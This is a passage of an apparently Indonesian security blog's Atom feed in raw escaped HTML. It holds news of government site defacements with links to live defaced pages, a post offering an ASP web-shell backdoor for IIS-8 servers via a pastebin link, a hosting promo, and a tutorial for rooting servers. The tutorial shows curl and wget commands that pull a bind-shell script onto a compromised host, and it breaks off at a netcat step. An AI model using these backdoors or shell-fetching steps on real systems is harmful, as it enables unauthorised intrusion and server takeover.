Helvetica, sans-serif;&quot;&gt;Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;https://defacer.id/archive/mirror/2586126&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;atau bisa langsung melihat di alamat :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;https://elhkpn.kpk.go.id/images/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/8318820335083561324/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/subdomain-situs-komisi-pemberantasan.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8318820335083561324'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8318820335083561324'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/subdomain-situs-komisi-pemberantasan.html' title='Subdomain Situs Komisi Pemberantasan Korupsi (KPK) Diretas'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-6bcgBEHW7v8/W3t-BxDrqCI/AAAAAAAAALg/EoMRB3bEYwcPmPHopiVXDO4ISTZG_sZWACLcBGAs/s72-c/KPK%2BDiretas.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-5065665630765474143</id><published>2018-08-20T18:29:00.002-07:00</published><updated>2018-08-20T18:29:55.506-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Situs Paspampres Kembali Diretas</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-0REB1DHf1N4/W3trAxz1U6I/AAAAAAAAALU/X3aisgDTN_MZJqg8EdwF9rBo9-KyLQjzACLcBGAs/s1600/Paspampress%2Bdiretas.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;745&quot; data-original-width=&quot;1433&quot; height=&quot;332&quot; src=&quot;https://4.bp.blogspot.com/-0REB1DHf1N4/W3trAxz1U6I/AAAAAAAAALU/X3aisgDTN_MZJqg8EdwF9rBo9-KyLQjzACLcBGAs/s640/Paspampress%2Bdiretas.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan &quot;Owned by Typical Idiot Security&quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.&lt;br /&gt;&lt;br /&gt;Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.zone-h.org/mirror/id/31589934&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;atau bisa langsung melihat di alamat :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;https://www.paspampres.mil.id/owned.html&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/5065665630765474143/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/situs-paspampres-kembali-diretas.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5065665630765474143'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5065665630765474143'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/situs-paspampres-kembali-diretas.html' title='Situs Paspampres Kembali Diretas'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-0REB1DHf1N4/W3trAxz1U6I/AAAAAAAAALU/X3aisgDTN_MZJqg8EdwF9rBo9-KyLQjzACLcBGAs/s72-c/Paspampress%2Bdiretas.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-5110176375302686529</id><published>2018-08-12T20:14:00.004-07:00</published><updated>2018-08-15T20:29:06.124-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ASP"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>ASP Shell Backdoor</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-yFmI87tmm_E/W3D1tSGL_II/AAAAAAAAAqY/Zml6ZojT0JgMFCd-mq7T2gPgxeOxnBtUwCLcBGAs/s1600/ASP.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;180&quot; data-original-width=&quot;350&quot; height=&quot;328&quot; src=&quot;https://4.bp.blogspot.com/-yFmI87tmm_E/W3D1tSGL_II/AAAAAAAAAqY/Zml6ZojT0JgMFCd-mq7T2gPgxeOxnBtUwCLcBGAs/s640/ASP.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke Kali ini Kita Update kembali , kali ini saya akan share ASP Shell Backdoor Shell ini beda dengan shell biasanya karena shell ini khusus&amp;nbsp;hanya untuk&amp;nbsp;Windows Server 2012&amp;nbsp; tepatnya pada Server IIS-8. Terkadang kita menemukan sebuah website dan ketika kita upload sebuah file ketika upload sukses namun ketika dilihat 404 Not Found dan tampilan nya merupakan 404 Not Found dari Server IIS-8 , yaps karena website yang menggunakan server IIS tidak bisa mengupload ext file sembarangan , jarang yang meng enablekan untuk ext php karena rentan dari attack , maka dari itu shell ini diperlukan karena shell ini di design khusus untuk Windows Server.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Apa sih bedanya Shell ASP sama PHP ? yok sedikit bahasan biar ga kaku :v&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kesimpulannya, baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;mungkin cukup sekian lah asupan tentang asp nya :v&lt;br /&gt;&lt;br /&gt;oke langsung saja&amp;nbsp;berikut merupakan tampilan dari shell nya :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-8qeIYHFRcks/W3D0QYb0I9I/AAAAAAAAAqM/dB7FmjIXigw8zcZ9Or_xo8-mYY_YKUGmwCEwYBhgL/s1600/IIS8%2BASP%2BBackdoor.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;348&quot; data-original-width=&quot;689&quot; height=&quot;321&quot; src=&quot;https://3.bp.blogspot.com/-8qeIYHFRcks/W3D0QYb0I9I/AAAAAAAAAqM/dB7FmjIXigw8zcZ9Or_xo8-mYY_YKUGmwCEwYBhgL/s640/IIS8%2BASP%2BBackdoor.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Source :&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;https://pastebin.com/iuJhCm8Y&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Semoga Bermanfaat&lt;br /&gt;&lt;br /&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/5110176375302686529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/iis8-asp-shell-backdoor-asp-command.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5110176375302686529'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5110176375302686529'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/iis8-asp-shell-backdoor-asp-command.html' title='ASP Shell Backdoor'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-yFmI87tmm_E/W3D1tSGL_II/AAAAAAAAAqY/Zml6ZojT0JgMFCd-mq7T2gPgxeOxnBtUwCLcBGAs/s72-c/ASP.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-8060013717642494858</id><published>2018-08-09T05:32:00.001-07:00</published><updated>2018-08-09T05:32:30.429-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Blogging"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Wordpress"/><title type='text'>Update Free WordPress Hosting 2018</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-VXabpBl7vgE/W2wy3vnDq1I/AAAAAAAAAKs/5yCY6rOVjRgrnUjcipa1OiYh7lBi4e_KwCLcBGAs/s1600/Hosting%2BGratis%2B2018.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;739&quot; data-original-width=&quot;1439&quot; height=&quot;328&quot; src=&quot;https://1.bp.blogspot.com/-VXabpBl7vgE/W2wy3vnDq1I/AAAAAAAAAKs/5yCY6rOVjRgrnUjcipa1OiYh7lBi4e_KwCLcBGAs/s640/Hosting%2BGratis%2B2018.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Oke Kembali lagi bersama saya , Kali ini saya akan memberi kabar gembira bagi para gretongers alias pecinta Gratisan yaps kali ini mengenai Hosting webserver :V&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Kali ini Rumahweb menyediakan Hosting WordPress Secara Gratis berikut spesifikasinya :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;menggabungkan performa Litespeed Webserver yang tak terbantahkan dengan kemudahan pengelolaan WordPress dari Plesk Panel.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;LiteSpeed WebServer untuk akses website secepat kilat&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;WordPress Toolkit untuk kemudahan mengelola WordPress&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Plesk Panel yang kaya fitur&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Unlimited Traffic&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Free SSL&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Cloud Based Infrastructure yang reliable&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Wow cukup menggiurkan bukan untuk para gretongers , yok buruan jangan sampai telat karena promo ini berbatas waktu.&lt;br /&gt;&lt;br /&gt;Kalian bisa Registrasi &lt;a href=&quot;https://www.rumahweb.com/wordpress-hosting-gratis/&quot;&gt;disini &lt;/a&gt;, so tunggu apa lagi ?&lt;br /&gt;&lt;br /&gt;Semoga bermanfaat bagi para gretongers ;) selamat beraktifitas kembali&lt;br /&gt;Terimakasih telah berkunjung di website kami pantau terus situs kami untuk update hal-hal menakjubkan lainnya :p&lt;br /&gt;&lt;br /&gt;(Zaenal Arifin)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/8060013717642494858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/update-free-wordpress-hosting-2018.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8060013717642494858'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8060013717642494858'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/update-free-wordpress-hosting-2018.html' title='Update Free WordPress Hosting 2018'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-VXabpBl7vgE/W2wy3vnDq1I/AAAAAAAAAKs/5yCY6rOVjRgrnUjcipa1OiYh7lBi4e_KwCLcBGAs/s72-c/Hosting%2BGratis%2B2018.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-6404813628946650386</id><published>2018-08-08T02:35:00.000-07:00</published><updated>2018-08-15T20:28:41.180-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Rooting"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Tutorial Backconnect Dengan BindShell</title><content type='html'>&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-lv9PqMsVJMw/W2q4zE7wejI/AAAAAAAAAKc/3Yp2bWoy-Eg9J50W9Ham8VOd_mga70tCgCLcBGAs/s1600/BindShell.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;720&quot; data-original-width=&quot;1280&quot; height=&quot;360&quot; src=&quot;https://1.bp.blogspot.com/-lv9PqMsVJMw/W2q4zE7wejI/AAAAAAAAAKc/3Yp2bWoy-Eg9J50W9Ham8VOd_mga70tCgCLcBGAs/s640/BindShell.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Material :&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Bindshell script&amp;nbsp; : &lt;a href=&quot;https://pastebin.com/raw/QWnYr6GD&quot;&gt;Here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Shell backdoor / webconsole shell : &lt;a href=&quot;http://web-console.org/&quot;&gt;Here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;netcat [if user windows] : &lt;a href=&quot;https://sourceforge.net/projects/nc110/&quot;&gt;Here&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Proof of Concept :&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Command Upload :&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Using Curl : &lt;b&gt;curl -o bind.pl [scriptlink]&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Using Wget : &lt;b&gt;wget [scriptlink] -o bind.pl&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;if u done upload the file go to cmd/Terminal [Netcat 